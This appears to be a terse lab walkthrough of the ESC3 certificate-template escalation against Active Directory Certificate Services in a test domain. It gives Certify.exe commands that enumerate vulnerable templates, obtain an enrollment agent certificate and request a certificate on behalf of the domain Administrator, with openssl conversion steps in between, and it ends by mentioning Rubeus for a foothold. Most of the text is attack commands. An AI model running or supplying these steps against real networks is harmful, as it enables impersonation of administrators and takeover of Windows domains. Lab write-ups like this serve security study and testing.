Enumeration
We found the enrollment agent certificate ESC3_v2_EnrollmentAgent with:
.\Certify.exe find /vulnerable
And we found user certificate for authentication ESC3_v2_UserWithAuthorizedSignatures with :
.\Certify.exe find
Getting the AgentEnrollment Certificate
.\Certify.exe request /ca:WIN-8DRJKS8Q1T9.labad.fr\labad-CA /template:ESC3_v2_EnrollmentAgent
Convert this pem into pfx:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxGetting the Auth Certificate
.\Certify.exe request /ca:WIN-8DRJKS8Q1T9.labad.fr\labad-CA /template:ESC3_v2_UserWithAuthorizedSignatures /onbehalfof:LABAD\Administrator /enrollcert:..\cert.pfx /enrollcertpw:own
Convert this pem into pfx:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxUsing rubeus and foothold with the last obtained certificate
